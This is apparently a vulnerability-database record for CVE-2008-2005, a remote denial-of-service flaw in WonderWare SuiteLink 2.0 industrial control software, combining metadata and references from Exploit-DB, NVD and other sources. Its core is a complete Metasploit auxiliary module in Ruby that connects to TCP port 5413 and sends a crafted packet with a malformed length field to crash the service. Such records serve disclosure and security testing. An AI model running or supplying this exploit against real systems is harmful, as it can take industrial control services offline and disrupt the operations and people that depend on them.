ID
VAR-E-200805-0160
CVE
cve_id: | CVE-2008-2005 | Trust: 2.4 |
EDB ID
6474
TITLE
WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit) - Windows dos Exploit
Trust: 0.6
DESCRIPTION
WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit). CVE-2008-2005CVE-44801 . dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | wonderware | model: | suitelink | scope: | eq | version: | 2.0 | Trust: 1.9 |
vendor: | wonderware | model: | suitelink patch | scope: | ne | version: | 2.001 | Trust: 0.3 |
EXPLOIT
##
# $Id: suitlink.rb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Wonderware SuitLink Denial of Service',
'Description' => %q{
This module exploits a denial of service vulnerability
within the SuitLink service in Wonderware products.
},
'Author' => [ 'belay tows' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'BID', '28974' ],
[ 'CVE', '2008-2005' ],
],
'DisclosureDate' => 'May 05 2008'))
register_options([Opt::RPORT(5413),], self.class)
end
def run
connect
print_status("Sending DoS packet...")
dos_length = 0xBAADF00D
pkt = "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F"
pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00"
pkt << [dos_length].pack("V")
len = [pkt.length].pack("C")
sock.put(len)
sock.put(pkt)
sleep 15 # wait to avoid thread shutdown event
disconnect
end
end
end
# milw0rm.com [2008-09-17]
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Denial of Service (Metasploit)
Trust: 1.0
TAGS
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
CREDITS
belay tows
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2008-2005 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 6474 | Trust: 1.6 |
db: | EDBNET | id: | 30705 | Trust: 0.6 |
db: | PACKETSTORM | id: | 70060 | Trust: 0.5 |
db: | CERT/CC | id: | VU#596268 | Trust: 0.3 |
db: | BID | id: | 28974 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2008-2005 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/6474/ | Trust: 0.6 |
url: | http://us.wonderware.com/ | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/596268 | Trust: 0.3 |
SOURCES
db: | BID | id: | 28974 |
db: | PACKETSTORM | id: | 70060 |
db: | EXPLOIT-DB | id: | 6474 |
db: | EDBNET | id: | 30705 |
LAST UPDATE DATE
2022-07-27T09:33:56.140000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 28974 | date: | 2008-09-17T18:10:00 |
SOURCES RELEASE DATE
db: | BID | id: | 28974 | date: | 2008-05-05T00:00:00 |
db: | PACKETSTORM | id: | 70060 | date: | 2008-09-17T15:21:44 |
db: | EXPLOIT-DB | id: | 6474 | date: | 2008-09-17T00:00:00 |
db: | EDBNET | id: | 30705 | date: | 2008-09-17T00:00:00 |